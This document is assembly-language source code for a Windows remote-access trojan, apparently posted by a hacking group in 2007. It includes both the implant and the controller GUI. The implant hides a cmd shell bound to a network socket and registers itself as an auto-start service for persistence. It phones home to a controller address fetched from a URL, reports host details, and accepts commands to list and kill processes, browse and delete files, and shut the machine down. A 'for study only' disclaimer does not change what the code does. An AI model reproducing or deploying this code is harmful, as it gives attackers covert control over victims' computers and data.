;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke GetStartupInfo,addr stStartUp
mov ebx,hSocket ;保存套接字到ebx
mov stStartUp.hStdInput,ebx ;给成员赋值,准备cmd转向输出
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,101h
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,CTXT("cmd"),NULL,NULL,1,0,NULL,NULL,addr stStartUp,addr stProcInfo
invoke WaitForSingleObject,addr stProcInfo.hProcess,INFINITE ; 阻塞等待进程结束
invoke closesocket,hSocket
ret
_Cmd endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CreateSerice proc
LOCAL hSCManager
LOCAL hService
LOCAL szBuff[MAX_PATH] :byte
LOCAL ServiceStatus:SERVICE_STATUS
invoke OpenSCManager, NULL, NULL, SC_MANAGER_Create_SERVICE ;连接服务管理器
.if eax!=0
mov hSCManager, eax ;连接成功,返回一个句柄
invoke OpenService, hSCManager,CTXT("GetSysService"), Delete ;打开服务
.if eax!=0 ;打开失败
push eax ;直接传递参数删除
invoke DeleteService, eax
call CloseServiceHandle
.endif
invoke GetModuleFileName,NULL,addr szBuff,200
invoke CreateService, hSCManager,CTXT("GetSysService"),CTXT("GetSysForShellexecute"),/ ;创建服务!
SERVICE_START + SERVICE_QUERY_STATUS + Delete, /
SERVICE_WIN32_OWN_PROCESS + SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START, /
SERVICE_ERROR_IGNORE, addr szBuff,NULL, NULL, NULL, NULL, NULL
.if eax!=0
mov hService, eax
invoke StartService, hService, 0, NULL;开始打开执行!
invoke CloseServiceHandle, hService
.endif
invoke CloseServiceHandle, hSCManager
.endif
ret
_CreateSerice endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;应该当作一个指针。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SendSysInfo proc _socket:LPSTR
local OS:OSVERSIONINFO
local szTime:SYSTEMTIME
local szTimeBuff[1024]:DWORD
local sa:in_addr
local @hKey:DWORD
local BufSize:DWORD
pushad
invoke gethostname,addr szHostName,sizeof szHostName
invoke gethostbyname,addr szHostName
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke inet_ntoa,eax
invoke wsprintf,addr szHost,CTXT("%s"),eax
invoke lstrcpy,addr sysinfo.szHostIP,addr szHost
invoke lstrcpy,addr sysinfo.szHostName,addr szHostName
invoke GetSystemTime,addr szTime
movzx ebx,szTime.wMonth
movzx eax,szTime.wDay
movzx ecx,szTime.wHour
movzx edx,szTime.wMinute
invoke wsprintf,addr szTimeBuff,CTXT("%d月%d日%d时%d秒"),ebx,eax,ecx,edx
invoke lstrcpy,addr sysinfo.szHostTime,addr szTimeBuff
invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKey,NULL, KEY_QUERY_VALUE,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegQueryValueEx,@hKey,addr szKey,NULL,NULL,addr szKeyName,addr BufSize ;读取注释内容
.if eax == ERROR_SUCCESS
invoke lstrcpy,addr sysinfo.szWhat,addr szKeyName ;有则填充
.elseif
invoke RtlZeroMemory,addr sysinfo.szWhat,sizeof sysinfo.szWhat ;无则清空
.endif
invoke RegCloseKey,@hKey
.endif
invoke lstrcat,addr szSysinfoData,addr sysinfo
invoke lstrcat,addr szSysinfoData,CTXT("[info]")
;--------------------------------------------------------------------------------------------------
;
;********[info] 前面是自定义协议,后面是判断的条件,发送到客户端后提取出判断条件,剩下的是协议
;
;---------------------------------------------------------------------------------------------------
invoke lstrlen,addr szSysinfoData
invoke send,_socket,addr szSysinfoData,eax,0
popad
ret
SendSysInfo endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Main proc
local @temp:SOCKET
local @stAddr:sockaddr_in
local @dwRecv
; call _CreateSerice ;设置系统服务启动(应该在程序开始启动的时候写进去)
connectstart:
invoke WSAStartup,202H,addr @stData
invoke RtlZeroMemory,addr @stAddr,sizeof sockaddr_in
mov @stAddr.sin_family,AF_INET
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;这里连接的端口要和客户端监听的端口一样
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
invoke htons,9999
mov @stAddr.sin_port,ax
call _ReadInternet
invoke inet_addr,addr szIP
mov @stAddr.sin_addr,eax
invoke socket,AF_INET,SOCK_STREAM,0
mov server,eax
invoke connect,server,addr @stAddr,sizeof @stAddr
.if eax == SOCKET_ERROR
jmp _Ret
.endif
invoke SendSysInfo,server ;发送肉鸡上线信息
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;循环处理客户消息命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.while TRUE
invoke RtlZeroMemory,addr lpBuffer,sizeof lpBuffer
invoke recv,server,addr lpBuffer,1024,0
mov @dwRecv,eax
invoke StrStr,addr lpBuffer,CTXT("[getprocess]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetProcessList,server,0,addr ThreadId
.endif
invoke StrStr,addr lpBuffer,CTXT("[killprocess]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13
lea esi,lpBuffer
lea edi,buff2
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _KillProcess,addr buff2,0,addr ThreadId1
.endif
invoke StrStr,addr lpBuffer,CTXT("[exitwindows]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _ExitWindows,0,0,addr ThreadId2
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfile]")
.if eax!=NULL
invoke CreateThread,NULL,0,addr _GetFileDsik,server,0,addr ThreadId3
.endif
invoke StrStr,addr lpBuffer,CTXT("[getfilepaht]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,13
lea esi,lpBuffer
lea edi,buff3
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _GetFilePath,addr buff3,0,addr ThreadId4
.endif
invoke StrStr,addr lpBuffer,CTXT("[delfile]")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,9
lea esi,lpBuffer
lea edi,buff4
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
invoke CreateThread,NULL,0,addr _DelFile,addr buff4,0,addr ThreadId5
.endif
invoke StrStr,addr lpBuffer,CTXT("Upfile")
.if eax!=NULL
pushad
invoke lstrlen,addr lpBuffer
sub eax,6
lea esi,lpBuffer
lea edi,buff5
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
; invoke MessageBox,0,addr buff5,0,0
; invoke CreateThread,NULL,0,addr _UpFile,server,0,addr ThreadId7
.endif
.endw
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Ret:
.if server
invoke closesocket,server
xor eax,eax
mov server,eax
.endif
invoke WSACleanup
invoke Sleep,1000
jmp connectstart
ret
_Main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start proc
invoke CreateMutex, NULL, TRUE,CTXT("GetSys1_Mutex")
mov ebx,eax
invoke GetLastError
.if eax!=0B7h
push ecx
invoke CreateThread,NULL,0,offset _Main,0,NULL,esp
pop ecx
invoke CloseHandle,eax
.elseif
mov eax,FALSE
.endif
;********************************************************************
; 消息循环
;********************************************************************
.while TRUE
invoke GetMessage,addr stMsg,NULL,0,0
invoke DispatchMessage,addr stMsg
.endw
ret
start endp
end start
注意:代码仅供学习之用,若用此代码修改写成恶意程序,与我无关.....
client.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include wsock32.inc
includelib wsock32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include comdlg32.inc
includelib comdlg32.lib
include ole32.inc
includelib ole32.lib
include shell32.inc
includelib shell32.lib
include odbc32.inc
includelib odbc32.lib
include macros.inc
include data.INC
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;客户端会话
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
SESSION struct
dwip dd ?
hsocket db 12 dup (?)
szHostIP db 156 dup(?)
szHostName db 156 dup(?)
szHostTime db 156 dup(?)
szWhat db 156 dup(?)
SESSION ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;自定义协议结构,显示肉鸡上线信息
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
MSG_SYSINFO struct
dwip dd ?
szHostIP db 156 dup(?)
szHostName db 156 dup(?)
szHostTime db 156 dup(?)
szWhat db 156 dup(?)
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;显示下线日志
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ShowProcess proc uses edi row:DWORD,lpTime:DWORD
LOCAL lvi:LV_ITEM
LOCAL buffer[1024]:DWORD
mov lvi.imask,LVIF_TEXT+LVIF_PARAM ;填充
push row
pop lvi.iItem ;传递row的值为lvi.iItem,纪录列举的文件个数
mov lvi.iSubItem,0
mov eax,lpTime;保存文件名到eax.这里lpFileName不是指针,所以用mov。如果是指针,用lea
mov lvi.pszText,eax;用文件名填充lvi.pszText
push row
pop lvi.lParam;传递row的值为lParam
invoke SendMessage,hlistview, LVM_InsertITEM,0, addr lvi ;输出每个文件名
;***********************************************************
ret
ShowProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 字符串到16或10进制
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_StrToVal proc _lpString,_dwBase
mov esi,_lpString
cld
xor eax,eax
mov ebx,_dwBase
.while TRUE
movzx ecx,byte ptr [esi]
inc esi
.break .if ! ecx
.if cl > '9'
and cl,not 20h
sub cl,'A' - 0ah
.else
sub cl,'0'
.endif
mul ebx
add eax,ecx
.endw
ret
_StrToVal endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;此函数的用途是选择每一个连接上的肉鸡socket的编号
;并发送命令
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
GetSocketAndSend proc _CmdLine:DWORD
pushad
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETCURSEL,0,0
lea ecx,@buff1
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETTEXT,eax,ecx
invoke _StrToVal,addr @buff1,00000010h
mov edi,eax
invoke lstrlen,_CmdLine
invoke send,edi,_CmdLine,eax,0
popad
ret
GetSocketAndSend endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_OpenFile proc _FileBuff:DWORD
local @stOF:OPENFILENAME
local @stES:EDITSTREAM
;********************************************************************
; 显示“打开文件”对话框
;********************************************************************
invoke RtlZeroMemory,addr @stOF,sizeof @stOF
mov @stOF.lStructSize,sizeof @stOF
push hWinMain
pop @stOF.hwndOwner
mov @stOF.lpstrFilter,offset szFilter
mov eax,_FileBuff
mov @stOF.lpstrFile,eax
mov @stOF.nMaxFile,MAX_PATH
mov @stOF.Flags,OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST
mov @stOF.lpstrDefExt,CTXT("文件")
invoke GetOpenFileName,addr @stOF
ret
_OpenFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 显示肉鸡上线数量
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_AddClient proc _hSocket
invoke WSAAsyncSelect,_hSocket,hWinMain,WM_SOCKET,FD_READ or FD_CLOSE
xor ebx,ebx
mov esi,offset stTable
.while ebx < MAX_SOCKET
.if ! dword ptr [esi]
push _hSocket
pop [esi]
inc dwCount
invoke wsprintf,addr @buff,CTXT("%x"),_hSocket
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr @buff
invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE
ret
.endif
inc ebx
add esi,4
.endw
invoke closesocket,_hSocket
ret
_AddClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;肉鸡下线就去掉一个socket,并删除ListBox里的socket编号
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RemoveClient proc _hSocket
local szTime:SYSTEMTIME
local szBuff[1024]:DWORD
local @dwListviewitem
xor ebx,ebx
xor ecx,ecx
mov esi,offset stTable
mov edi,_hSocket
.while ebx < MAX_SOCKET
.if [esi] == edi
invoke closesocket,[esi]
mov dword ptr [esi],0
dec dwCount
invoke SetDlgItemInt,hWinMain,IDC_Socket,dwCount,FALSE
invoke GetSystemTime,addr szTime
movzx eax,szTime.wMonth
movzx ecx,szTime.wDay
movzx edx,szTime.wHour
movzx ebx,szTime.wMinute
invoke wsprintf,addr szBuff,CTXT("有主机下线请注意,下线时间为:%d月%d日%d时%d秒"),eax,ecx,edx,ebx
; invoke _ListViewSetItem,hlistview,@dwListviewitem,ONE-1,addr szBuff
invoke ShowProcess,ecx,addr szBuff
inc ecx
invoke SendDlgItemMessage,hWinMain,IDC_Log,LB_ADDSTRING,0,addr szBuff
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_GETCURSEL,0,0
invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_DeleteSTRING,eax,0
ret
.endif
inc ebx
add esi,4
.endw
ret
_RemoveClient endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 处理接收到的TCP包
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RecvDataServer proc _hSocket
invoke RtlZeroMemory,addr szReadBuffer,sizeof szReadBuffer
invoke recv,_hSocket,addr szReadBuffer,sizeof szReadBuffer,NULL
invoke StrStr,addr szReadBuffer,CTXT(":/") ;对接收的数据进行处理,是否有:/ 有则代表是文件路径
.if eax!=NULL
inc lpAllFile
invoke SendDlgItemMessage,hWinMain2,IDC_FileList,LB_ADDSTRING,0,addr szReadBuffer
invoke SetDlgItemText,hWinMain2,IDC_GetSomeThing,addr szReadBuffer
invoke wsprintf,addr szFileShuMu,CTXT("%d 个文件或目录"),lpAllFile
invoke SetDlgItemText,hWinMain2,IDC_AllFile,addr szFileShuMu
.endif
; invoke StrStr,addr szReadBuffer,CTXT("computerIP")
; .if eax!=NULL
; invoke SendDlgItemMessage,hWinMain,IDC_ServerList,LB_ADDSTRING,0,addr szReadBuffer
; .endif.
invoke StrStr,addr szReadBuffer,CTXT(":/") ;对接受的数据进行处理,如果没有 :/ 同时有 .exe 就代表是进程。
.if eax==NULL
invoke StrStr,addr szReadBuffer,CTXT(".exe")
.if eax!=NULL
inc lpShuMu
invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_ADDSTRING,0,addr szReadBuffer
invoke wsprintf,addr szProcessShuMu,CTXT("%d 个进程"),lpShuMu
invoke SetDlgItemText,hWinMain1,IDC_ProcessShuMu,addr szProcessShuMu
.endif
.endif
;对接受的数据进行处理,如果有[info]这个标识,说明这个数据显示的是肉鸡的上线信息
;然后把[info]这6个字符串从数据中清除。
invoke StrStr,addr szReadBuffer,CTXT("[info]")
.if eax!=NULL
pushad
invoke lstrlen,addr szReadBuffer
sub eax,6
lea esi,szReadBuffer
lea edi,buff2
add esi,0
mov ecx,eax
rep movsb
mov byte ptr [edi],0
popad
;invoke MessageBox,0,addr buff2,0,0
.endif
ret
_RecvDataServer endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 初始化 Socket,绑定到服务TCP端口并监听
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Init proc
local @stWsa:WSADATA
local @stSin:sockaddr_in
invoke WSAStartup,101h,addr @stWsa
invoke socket,AF_INET,SOCK_STREAM,0
mov Socket,eax
invoke WSAAsyncSelect,Socket,hWinMain,WM_SOCKET,FD_ACCEPT
invoke RtlZeroMemory,addr @stSin,sizeof @stSin
invoke htons,9999
mov @stSin.sin_port,ax
mov @stSin.sin_family,AF_INET
mov @stSin.sin_addr,INADDR_ANY
invoke bind,Socket,addr @stSin,sizeof @stSin
.if eax == SOCKET_ERROR
invoke MessageBox,hWinMain,CTXT("本程序已经监听,无法进行第二次操作"),NULL,/
MB_OK or MB_ICONWARNING
ret
.else
invoke listen,Socket,5
.endif
ret
_Init endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgProcess proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
local @szBuffer[128]:byte
local szKillProcess[1024]:byte
local szOut[1024]:byte
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd1,NULL
.elseif eax == WM_INITDIALOG
push hWnd1
pop hWinMain1
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_GetProcessList
mov lpShuMu,0
invoke SendDlgItemMessage,hWnd1,IDC_ProcessList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getprocess]")
.elseif ax == IDC_ProcessList
shr eax,16
.if ax == LBN_SELCHANGE
;********************************************************************
; 将鼠标点击结果弹出来
;********************************************************************
invoke SendMessage,lParam,LB_GETCURSEL,0,0
lea ecx,@szBuffer
invoke SendMessage,lParam,LB_GETTEXT,eax,ecx
invoke wsprintf,addr szOut,CTXT("你确定要结束对方 %s 这个进程吗?"),addr @szBuffer
invoke MessageBox,hWnd1,addr szOut,CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
.if eax!=IDNO
invoke RtlZeroMemory,addr szKillProcess,sizeof szKillProcess
invoke lstrcat,addr szKillProcess,addr @szBuffer
invoke lstrcat,addr szKillProcess,CTXT("[killprocess]")
invoke GetSocketAndSend,addr szKillProcess
.endif
.endif
.elseif ax == IDC_RefeProcessList
mov lpShuMu,0
invoke SendDlgItemMessage,hWinMain1,IDC_ProcessList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getprocess]")
.elseif ax == IDC_ExitWindows
invoke MessageBox,hWnd1,CTXT("这条命令会无条件关闭对方电脑,是否要执行?"),CTXT("友情提示"),MB_YESNO or MB_ICONINFORMATION
.if eax!=IDNO
invoke GetSocketAndSend,CTXT("[exitwindows]")
.endif
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgProcess endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgFile proc uses ebx edi esi hWnd1,wMsg,wParam,lParam
local @szBuffer1[1024]:byte
local @szBuffer2[1024]:byte
local buff[1024]:byte
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd1,NULL
.elseif eax == WM_INITDIALOG
push hWnd1
pop hWinMain2
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd1,WM_SETICON,ICON_BIG,eax
mov lpAllFile,0
invoke GetSocketAndSend,CTXT("[getfile]")
;invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_ADDSTRING,0,CTXT("d:/asm.txt")
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_LookFile1
invoke _OpenFile,addr szBenDiFile
invoke SetDlgItemText,hWnd1,IDC_BenDiFile,addr szBenDiFile
.elseif ax == IDC_FileList
mov lpAllFile,0
shr eax,16
.if ax == LBN_SELCHANGE
;********************************************************************
; 将鼠标点击结果弹出来
;********************************************************************
invoke SendMessage,lParam,LB_GETCURSEL,0,0
lea ecx,@szBuffer1
invoke SendMessage,lParam,LB_GETTEXT,eax,ecx
invoke RtlZeroMemory,addr @szBuffer2,sizeof @szBuffer2
invoke lstrcat,addr @szBuffer2,addr @szBuffer1
invoke lstrcat,addr @szBuffer2,CTXT("[getfilepaht]")
invoke GetSocketAndSend,addr @szBuffer2
invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
invoke SetDlgItemText,hWnd1,IDC_YuanChengFile,addr @szBuffer1
invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnYuanCheng,addr @szBuffer1
invoke SetDlgItemText,hWnd1,IDC_FileToDel,addr @szBuffer1
.endif
.elseif ax == IDC_LookFile2
invoke _OpenFile,addr szBenDiFile1
invoke SetDlgItemText,hWnd1,IDC_FileToLoadOnBenDi,addr szBenDiFile1
.elseif (ax == IDC_CHECK2)||(ax == IDC_LoadDownFile)
;
.elseif ax == IDC_DelFile
invoke MessageBox,hWnd1,CTXT("真的要删除远程主机上的文件吗?"),CTXT("友情提示"),MB_ICONINFORMATION
.if eax!=IDNO
invoke GetDlgItemText,hWnd1,IDC_FileToDel,addr szFileToDel,sizeof szFileToDel
invoke lstrlen,addr szFileToDel
sub eax,0
lea esi,szFileToDel
lea edi,buff
add esi,2
mov ecx,eax
rep movsb
mov byte ptr [edi],0
invoke StrStr,addr szFileToDel,CTXT(".")
.if eax==NULL
invoke MessageBox,NULL,CTXT("你选择的不是文件,无法删除"),CTXT("友情提示"),MB_ICONSTOP
.elseif eax!=NULL
invoke lstrcat,addr szDelFile,addr szFileToDel
invoke lstrcat,addr szDelFile,CTXT("[delfile]")
invoke lstrlen,addr szDelFile
invoke MessageBox,0,addr szDelFile,0,0
invoke GetSocketAndSend,addr szDelFile
.endif
.endif
.elseif ax == IDC_RefeFileList
mov lpAllFile,0
invoke SendDlgItemMessage,hWnd1,IDC_FileList,LB_RESETCONTENT,0,0
invoke GetSocketAndSend,CTXT("[getfile]")
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
mov eax,wMsg
.if eax == WM_SOCKET
mov eax,lParam
.if ax == FD_ACCEPT
invoke accept,wParam,0,0 ;等待连接
mov hSocket1,eax
invoke CreateThread,NULL,0,addr _AddClient,hSocket1,0,addr ThreadId
.elseif ax == FD_READ
invoke CreateThread,NULL,0,addr _RecvDataServer,wParam,0,addr ThreadId1
.elseif ax == FD_CLOSE
invoke CreateThread,NULL,0,addr _RemoveClient,wParam,0,addr ThreadId2
.endif
.elseif eax == WM_CLOSE
invoke closesocket,Socket
invoke WSACleanup
invoke EndDialog,hWnd,NULL
;//
.elseif eax == WM_INITDIALOG
push hWnd
pop hWinMain
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke GetDlgItem,hWnd,IDC_Log
mov hlistview,eax
;invoke InsertColumn
;初始化控件
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDC_LoadServer
invoke MessageBox,NULL,CTXT("配制服务端,暂时不写进去"),0,0
.elseif ax == IDC_Port
call _Init
.elseif ax == IDC_Process
invoke DialogBoxParam,hInstance,DLG_Process,NULL,offset _ProcDlgProcess,NULL
.elseif ax == IDC_File
invoke DialogBoxParam,hInstance,DLG_File,NULL,offset _ProcDlgFile,NULL
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
server.asm
;******************************************************
;程序编写by Asm
;日期:2007-6-13日
;出处: http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组( http://www.wolfexp.net/)
;******************************************************
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
include wininet.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
includelib wininet.lib
includelib advapi32.lib
include Shlwapi.inc
includelib Shlwapi.lib
include w2k/ntdll.inc
includelib ntdll.lib
include macros.inc
MSG_SYSINFO struct
dwip dd ?
szHostIP db 156 dup(?)
szHostName db 156 dup(?)
szHostTime db 156 dup(?)
szWhat db 156 dup(?)
MSG_SYSINFO ends
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;这里不能包含ntddk.inc,否则和windows.inc产生矛盾。因此要自定义SE_SHUTDOWN_PRIVILEGE的值
SE_SHUTDOWN_PRIVILEGE equ 19
SendSysInfo proto :LPSTR
.data
lpBuffer db 10024 dup(0)
buff db "%s",13,10,0
szUrl db ' http://www.asm32.cn/ip.txt',0
szVol db 'C',0
szRegKey db "SOFTWARE/Microsoft/Windows",0
szKey db "zhushi",0 ;键值名称
.data?
szIP db 1024 dup(?)
buff1 db 1025 dup(?)
szSerice db 1024 dup(?)
server SOCKET ?
client SOCKET ?
hWinMain dd ?
hSnapShot dd ?
closepid dd ?
Pid dd ?
dwFolderCount dd ?
@stData WSADATA<?>
ThreadId DWORD ?
ThreadId1 DWORD ?
ThreadId2 DWORD ?
ThreadId3 DWORD ?
ThreadId4 DWORD ?
ThreadId5 DWORD ?
ThreadId6 DWORD ?
ThreadId7 DWORD ?
stMsg MSG<?>
szHostName db 1024 dup(?)
SendData db 1024 dup(?)
SendData1 db 1024 dup(?)
szHost db 1024 dup(?)
buffer db 1024 dup(?)
buff2 db 1024 dup(?)
buff3 db 1024 dup(?)
buff4 db 1024 dup(?)
buff5 db 10024 dup(?)
buff6 db 10024 dup(?)
sysinfo MSG_SYSINFO<?>
szSysinfoData db 1024 dup(?)
